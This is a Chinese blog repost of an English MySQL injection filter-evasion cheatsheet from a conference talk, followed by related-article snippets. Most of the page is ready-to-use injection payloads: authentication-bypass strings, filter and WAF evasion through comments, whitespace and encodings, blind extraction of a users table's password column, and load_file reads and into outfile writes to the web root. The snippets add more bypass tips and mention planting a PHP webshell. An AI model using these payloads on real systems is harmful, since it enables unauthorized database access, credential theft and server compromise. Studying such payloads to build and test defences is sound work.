mysql注入过滤_mysql绕过注入过滤

最新推荐文章于 2023-05-17 22:50:11 发布
最新推荐文章于 2023-05-17 22:50:11 发布
阅读量278 收藏
点赞数
文章标签: mysql注入过滤
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_30359265/article/details/113159542
版权

This week I presented my experiences in SQLi filter evasion techniques that I have gained during 3 years of PHPIDS filter evasion at the CONFidence 2.0 conference. You can find the slides here. For a quicker reference you can use the following cheatsheet. More detailed explaination can be found in the slides or in the talk (video should come online in a few weeks).

Basic filter

Comments

‘ or 1=1#

‘ or 1=1– -

‘ or 1=1/* (MySQL < 5.1)

' or 1=1;%00

' or 1=1 union select 1,2 as `

' or#newline

1='1

' or– -newline

1='1

' /*!50000or*/1='1

' /*!or*/1='1

Prefixes

+ – ~ !

‘ or –+2=- -!!!’2

Operators

^, =, !=, %, /, *, &, &&, |, ||, , >>, <=, <=, ,, XOR, DIV, LIKE, SOUNDS LIKE, RLIKE, REGEXP, LEAST, GREATEST, CAST, CONVERT, IS, IN, NOT, MATCH, AND, OR, BINARY, BETWEEN, ISNULL

Whitespaces

%20 %09 %0a %0b %0c %0d %a0 /**/

‘or+(1)sounds/**/like“1“–%a0-

‘union(select(1),tabe_name,(3)from`information_schema`.`tables`)#

Strings with quotes

SELECT ‘a’

SELECT “a”

SELECT n’a’

SELECT b’1100001′

SELECT _binary’1100001′

SELECT x’61′

Strings without quotes

‘abc’ = 0×616263

Aliases

select pass as alias from users

select pass aliasalias from users

select pass`alias alias`from users

Typecasting

‘ or true = ’1 # or 1=1

‘ or round(pi(),1)+true+true = version() # or 3.1+1+1 = 5.1

‘ or ’1 # or true

Compare operator typecasting

select * from users where ‘a’='b’='c’

select * from users where (‘a’='b’)=’c’

select * from users where (false)=’c’

select * from users where (0)=’c’

select * from users where (0)=0

select * from users where true

select * from users

Authentication bypass ‘=’

select * from users where name = ”=”

select * from users where false = ”

select * from users where 0 = 0

select * from users where true

select * from users

Authentication bypass ‘-’

select * from users where name = ”-”

select * from users where name = 0-0

select * from users where 0 = 0

select * from users where true

select * from users

Function filter

General function filtering

ascii (97)

load_file/*foo*/(0×616263)

Strings with functions

‘abc’ = unhex(616263)

‘abc’ = char(97,98,99)

hex(‘a’) = 61

ascii(‘a’) = 97

ord(‘a’) = 97

‘ABC’ = concat(conv(10,10,36),conv(11,10,36),conv(12,10,36))

Strings extracted from gadgets

collation(\N) // binary

collation(user()) // utf8_general_ci

@@time_format// %H:%i:%s

@@binlog_format// MIXED

@@version_comment// MySQL Community Server (GPL)

dayname(from_days(401))// Monday

dayname(from_days(403))// Wednesday

monthname(from_days(690)) // November

monthname(from_unixtime(1))// January

collation(convert((1)using/**/koi8r))// koi8r_general_ci

(select(collation_name)from(information_schema.collations)where(id)=2) // latin2_czech_cs

Special characters extracted from gadgets

aes_encrypt(1,12)// 4çh±{?”^c×HéÉEa

des_encrypt(1,2)// ‚GÒ/ïÖk

@@ft_boolean_syntax// + ->

@@date_format// %Y-%m-%d

@@innodb_log_group_home_dir// .\

Integer representations

false: 0

true: 1

true+true: 2

floor(pi()): 3

ceil(pi()): 4

floor(version()): 5

ceil(version()): 6

ceil(pi()+pi()): 7

floor(version()+pi()): 8

floor(pi()*pi()): 9

ceil(pi()*pi()): 10

concat(true,true): 11

ceil(pi()*pi())+true: 11

ceil(pi()+pi()+version()): 12

floor(pi()*pi()+pi()): 13

ceil(pi()*pi()+pi()): 14

ceil(pi()*pi()+version()): 15

floor(pi()*version()): 16

ceil(pi()*version()): 17

ceil(pi()*version())+true: 18

floor((pi()+pi())*pi()): 19

ceil((pi()+pi())*pi()): 20

ceil(ceil(pi())*version()): 21

concat(true+true,true): 21

ceil(pi()*ceil(pi()+pi())): 22

ceil((pi()+ceil(pi()))*pi()): 23

ceil(pi())*ceil(version()): 24

floor(pi()*(version()+pi())): 25

floor(version()*version()): 26

ceil(version()*version()): 27

ceil(pi()*pi()*pi()-pi()): 28

floor(pi()*pi()*floor(pi())): 29

ceil(pi()*pi()*floor(pi())): 30

concat(floor(pi()),false): 30

floor(pi()*pi()*pi()): 31

ceil(pi()*pi()*pi()): 32

ceil(pi()*pi()*pi())+true: 33

ceil(pow(pi(),pi())-pi()): 34

ceil(pi()*pi()*pi()+pi()): 35

floor(pow(pi(),pi())): 36

@@new: 0

@@log_bin: 1

!pi(): 0

!!pi(): 1

true-~true: 3

log(-cos(pi())): 0

-cos(pi()): 1

coercibility(user()): 3

coercibility(now()): 4

minute(now())

hour(now())

day(now())

week(now())

month(now())

year(now())

quarter(now())

year(@@timestamp)

crc32(true)

Extract substrings

substr(‘abc’,1,1) = ‘a’

substr(‘abc’ from 1 for 1) = ‘a’

substring(‘abc’,1,1) = ‘a’

substring(‘abc’ from 1 for 1) = ‘a’

mid(‘abc’,1,1) = ‘a’

mid(‘abc’ from 1 for 1) = ‘a’

lpad(‘abc’,1,space(1)) = ‘a’

rpad(‘abc’,1,space(1)) = ‘a’

left(‘abc’,1) = ‘a’

reverse(right(reverse(‘abc’),1)) = ‘a’

insert(insert(‘abc’,1,0,space(0)),2,222,space(0)) = ‘a’

space(0) = trim(version()from(version()))

Search substrings

locate(‘a’,'abc’)

position(‘a’,'abc’)

position(‘a’ IN ‘abc’)

instr(‘abc’,'a’)

substring_index(‘ab’,'b’,1)

Cut substrings

length(trim(leading ‘a’ FROM ‘abc’))

length(replace(‘abc’, ‘a’, ”))

Compare strings

strcmp(‘a’,'a’)

mod(‘a’,'a’)

find_in_set(‘a’,'a’)

field(‘a’,'a’)

count(concat(‘a’,'a’))

String length

length()

bit_length()

char_length()

octet_length()

bit_count()

String case

ucase

lcase

lower

upper

password(‘a’) != password(‘A’)

old_password(‘a’) != old_password(‘A’)

md5(‘a’) != md5(‘A’)

sha(‘a’) != sha(‘A’)

aes_encrypt(‘a’) != aes_encrypt(‘A’)

des_encrypt(‘a’) != des_encrypt(‘A’)

Keyword filter

Connected keyword filtering

(0)union(select(table_name),column_name,…

0/**/union/*!50000select*/table_name`foo`/**/…

0%a0union%a0select%09group_concat(table_name)….

0′union all select all`table_name`foo from`information_schema`. `tables`

OR, AND

‘||1=’1

‘&&1=’1

‘=’

‘-’

OR, AND, UNION

‘ and (select pass from users limit 1)=’secret

OR, AND, UNION, LIMIT

‘ and (select pass from users where id =1)=’a

OR, AND, UNION, LIMIT, WHERE

‘ and (select pass from users group by id having id = 1)=’a

OR, AND, UNION, LIMIT, WHERE, GROUP

‘ and length((select pass from users having substr(pass,1,1)=’a'))

OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING

‘ and (select substr(group_concat(pass),1,1) from users)=’a

‘ and substr((select max(pass) from users),1,1)=’a

‘ and substr((select max(replace(pass,’lastpw’,”)) from users),1,1)=’a

OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING, SELECT

‘ and substr(load_file(‘file’),locate(‘DocumentRoot’,(load_file(‘file’)))+length(‘DocumentRoot’),10)=’a

‘=” into outfile ‘/var/www/dump.txt

OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING, SELECT, FILE

‘ procedure analyse()#

‘-if(name=’Admin’,1,0)#

‘-if(if(name=’Admin’,1,0),if(substr(pass,1,1)=’a',1,0),0)#

Control flow

case ‘a’ when ‘a’ then 1 [else 0] end

case when ‘a’='a’ then 1 [else 0] end

if(‘a’='a’,1,0)

ifnull(nullif(‘a’,'a’),1)

If you have any other useful tricks I forgot to list here please leave a comment.

默默的奶爸
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【漏洞挖掘】——18、SSI漏洞介绍于挖掘(下)
Fly_鹏程万里
03-02 4886
网站存在.stm,.shtm和.shtml文件,那说明该网站支持SSI指令,由于后缀名并非是强制规定的,因此如果没有发现任何.shtml文件也并不意味着目标网站没有受到SSI注入攻击的可能。由于上面查看的环境中文件以php结尾,故此我们可以判断目标环境为php环境,所以我们可以直接通过SSI漏洞来写入PHP木马文件实现getshell目的。在本文中我们对SSI(Server Side Includes)漏洞原理进行了介绍并基于靶机对漏洞的利用检测进行了进一步的详细说明~随后我们进行一个列目录的操作。
MySQL注入绕开过滤的技巧总结
09-09
以下是一些常见的MySQL注入绕过过滤的策略: 1. **空格替代**: - 如果空格被过滤,可以使用括号`()`来代替空格。例如,原本的`select * from users where id=1;`可以改写为`select * from(users)where id=1;`,...
MSSQL手工注入常用语句
weixin_34107955的博客
10-21 86
自己整理了一些放到这里,以备不时之需。 [常规查询]and exists (select * from sysobjects) //判断是否是MSSQLand 1=convert(int,@@version) 或1=(select @@version) //判断数据库版本;declare @d int...
过滤mysql注入_mysql 注入过滤
weixin_29235923的博客
01-18 219
//表单过滤public function _safe($str) {$html_string = array("&", "", "'", '"', "", "\t", "\r");$html_clear = array("&", " ", "'", """, "<", ">", " ", "");$js_string = array("//isU");$js_...
mysql注释_WAF Bypass数据库特性(Mysql探索篇)
weixin_39629129的博客
12-05 194
0x01 前言我们经常利用一些数据库特性来进行WAF绕过。在Mysql中,比如可以这样:内联注释: /*!12345union*/selectMysql黑魔法: select{x user}from{x mysql.user};换行符绕过:%23%0a、%2d%2d%0a一起去探索一下能够绕过WAF防护的数据库特性。0x02 测试常见有5个位置即: SELECT * FROM adm...
mysql 注入过滤
aini6223017的博客
03-11 240
//表单过滤public function _safe($str) { $html_string = array("&amp;", "&nbsp;", "'", '"', "<", ">", "\t", "\r"); $html_clear = array("&", " ", "&#39;", "&quot;", "&amp...
mysql 注入 绕过_SQL注入测试技巧TIP:再从Mysql注入绕过过滤说起
weixin_30070663的博客
01-18 139
*本文原创作者:Zzzxbug,本文属FreeBuf原创奖励计划,未经许可禁止转载对于mysql注入,基本上是每一名web安全从业者入门的基本功,这里不多废话,结合本人无聊时在mysql上的测试,来谈一谈mysql过滤某些特殊字符情况下的注入,因为是想到哪写到哪,文章比较散,各位大佬请绕过,和我一样的小白可以看一看,温故而知新,必有所获。php查询mysql的后台脚本就不搭了,没有多大意义,直...
Mysql如何巧妙的绕过未知字段名详解
09-09
对于逗号的过滤,我们可以使用 `JOIN` 操作来绕过,因为 `JOIN` 语句中的字段分隔符不是逗号。 当字段名未知且无法直接通过 `INFORMATION_SCHEMA.COLUMNS` 获取时,可以利用联合查询(UNION SELECT)来达到目的。...
SQL Injection with MySQL 注入分析
09-14
误区在于,许多人误以为在PHP+MySQL下必须使用单引号进行SQL注入,或者无法像在MSSQL中那样通过声明变量和执行系统命令来绕过引号。实际上,只要能构造出不受引号限制的SQL语句,就有可能实现注入。例如,可以通过`...
php+mysql注入页面实现
09-11
SQL注入是一种攻击手段,通过输入恶意的SQL代码,攻击者可以绕过网站的安全防护,获取、修改或删除数据库中的敏感信息。在这个过程中,我们主要关注如何构建一个模拟SQL注入漏洞的环境,以便于学习和测试防护措施。 ...
关于MySQL绕过授予information_schema中对象时报ERROR 1044(4200)错误
12-14
这个问题是微信群中网友关于MySQL权限的讨论,有这么一个业务需求(下面是他的原话): 因为MySQL的很多功能都依赖主键,我想用zabbix用户,来监控业务数据库的所有表,是否都建立了主键。 监控的语句是: FROM information_schema.tables t1 LEFT OUTER JOIN information_schema.table_constraints t2 ON t1.table_schema = t2.table_schema AND t1.table_name = t2.table_name
MySQL 安全及防止 SQL 注入攻击
wjq008的专栏
04-27 1673
如果通过网页获取用户输入的数据并将其插入MySQL数据库,那么就有可能发生SQL注入攻击的安全问题作为研发,有一条铁律需要记住,那就是。
mysql注入绕过information_schema过滤
b1ackc4t的博客
10-19 5711
1.利用mysql5.7新增的sys.schema_auto_increment_columns 这是sys数据库下的一个视图,基础数据来自与information_schema,他的作用是对表的自增ID进行监控,也就是说,如果某张表存在自增ID,就可以通过该视图来获取其表名和所在数据库名 以下为该视图的所有列 2.sys.schema_table_statistics_with_buffer 这是sys数据库下的视图,里面存储着所有数据库所有表的统计信息 ...
MYSQL注入绕过技巧
eT48_Sec
12-23 5460
/lingdao.php?id=161.0ORDER BY%2B9 /lingdao.php?id=4.990Union(select-1.0,2,3,4,5,6,7,@@version) Article/show/id/4.0Union(select-0.1,2,USER,password,5,6,7,8,9,10,11,12,13.0FROM mysql%252euser)
WAF-----mysql特殊符号
bylfsj的博客
09-27 511
waf 绕过的技巧 研究过国内外的waf。分享一些 奇淫绝技。 一些大家都了解的技巧如:/!/,SELECT[0x09,0x0A-0x0D,0x20,0xA0]xx FROM 不再重造轮子。 MySQL tips1: 神奇的 ` (格式输出表的那个控制符) 过空格和一些正则。 mysql> select`version`() -> ; +----------------...
Mysql利用/*!select*/ 突破防注入
weixin_33819479的博客
01-19 156
文/meao 昨天在检测一个外国PHP网站时 在id=255后加’出现forbidden 于是我and 1=1正常 and 1=2出错 说明肯定有注入 接着我order by猜出字段 然后union select 1,2,3,4 //悲剧的又出现了forbidden 肯定是做了过滤了 后来构造了语句id=-255+union+/*!select*/+1,2...
MySQL绕过WAF实战技巧
最新发布
MachineGunJoe666
05-17 290
本人喜欢遇到好的东西,互相学习,共同进步。在安全行业也有些曲折,发过工控协议fuzzing的入门教程,也发过无线安全的渗透测试脚本。这次发个web的吧。仅供学习,本人也是小菜。大牛直接飞过吧。绕过方千变万化,思路+知识积累是不可或缺的。希望这篇文章对学习bypass的小伙伴有用。本人也在学习和搜集关于oracle的一些绕过waf技巧,有感兴趣的可以互相学习,探讨。
mysql绕过waf_SQL注入中的WAF绕过技术
weixin_33435461的博客
02-19 423
1.大小写绕过这个大家都很熟悉,对于一些太垃圾的WAF效果显著,比如拦截了union,那就使用Union UnIoN等等绕过。2.简单编码绕过比如WAF检测关键字,那么我们让他检测不到就可以了。比如检测union,那么我们就用%55也就是U的16进制编码来代替U,union写成 %55nION,结合大小写也可以绕过一些WAF,你可以随意替换一个或几个都可以。也还有大家在Mysql注入中比如表名或是...
sqlilabs过关手册注入天书.pdf
09-14
"《Mysql注入---sqlilabs---lcamry MYSQL注入天书》是作者Lcamry创作的一份关于SQL注入的学习手册,主要针对SQLi-labs平台的挑战进行详细解析,涵盖了基础到高级的MySQL注入技术,包括盲注、导入导出操作、增删改...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值